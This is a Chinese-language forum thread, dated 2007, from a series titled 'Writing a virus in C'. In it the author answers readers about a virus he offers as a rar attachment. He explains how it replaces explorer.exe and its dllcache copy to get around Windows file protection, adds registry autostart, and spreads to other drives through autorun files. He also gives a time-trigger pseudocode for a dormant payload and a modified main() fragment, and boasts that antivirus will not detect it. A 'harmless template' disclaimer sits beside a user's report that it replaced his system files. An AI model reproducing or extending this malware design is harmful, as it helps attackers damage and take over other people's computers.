本连载文章只讨论写病毒的技术,并不讨论危害计算机及网络,所示例的程序只是一个无危害的模板,你可以在技

术范围及法律范围内扩充实验.

在读本程序前请保证不用此程序进行违法活动,由于你使用本程序而对他人、组织等造成的任何损失都由将你承

担，本人不负任何责任，否则,请马上离开.

从本篇文章开始，拒绝任何形式的转载（本人除外），否则属于著作侵权，将受到《中华人民共和国软件保护

条理》、《中华人民共和国著作权法》等法律最大限度的制裁！！

iIrUdW6N.rar (25.04 KB) [原创]用C语言写病毒(2)

应该不可以，要用DEV-CPP,是免费的

还没有,7.2日考.

以下是引用a429499381在2007-6-21 9:57:50的发言：
我实验过了一下， 不怎么好玩， 反映太大， 一看知道是病毒发作！！
而且替换了我的系统文件，

没有设潜伏,因此是这样,主要是让用户知道,事实上如果让它定期发作是很容易的
伪代码:if(time_is_out) run(); else exit(0);
只是这样不利于实验

因为explorer.exe是不能直接删除的,必须改名后注销或重起才能删除,因此首次运行只是改名,重起后病毒自动将其删除,再者,在C:\windows\system\有explorer.exe的原文件,这就是病毒提前提前运行后还出现桌面的原因.
argc和argv是主程序参数,举个例子
执行svchost.com /s时 argc为命令数(以' '为界),因此为2(因为svchost.com是一个 /s是一个)
argv[0]存储第一个命令 "svchost.com"
argv[1]存储第二个命令 "/s"

这段代码有一个不足之处
如果喜欢实验，可以在代码中加入 if(!autorun_explorer()) goto next1;　即上述代码改为
int main(int argc,char **argv)
{
int contral=0;
if(argc>1)
if(strcmp(argv[1],"/s")==0)
goto next1;
if(!autorun_explorer()) goto next1;
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
next1:
add_reg();
最后：卸载程序执行后如果鼠标恢复正常请不要再次执行．

首先,我没有写漏,因为c:\windows\explorer.exe和%sysdir%\dllcache\explorer.exe是一样的文件,因为系统文件保护机制,因此必须全部替换.搜索磁盘,注意,除了C外,其它磁盘只将病毒体复制到其根目录并加入自动运行文件(自动运行文件替换原打开方式,使其完全与未感染的一样，但无论如何的打开都将再次运行)

以下是引用vfdff在2007-8-12 18:16:24的发言：
附件不能下呀 @全部被我的杀毒软件阻止了

什么杀毒软件?
除非有人上报了杀毒软件商,否则不会被杀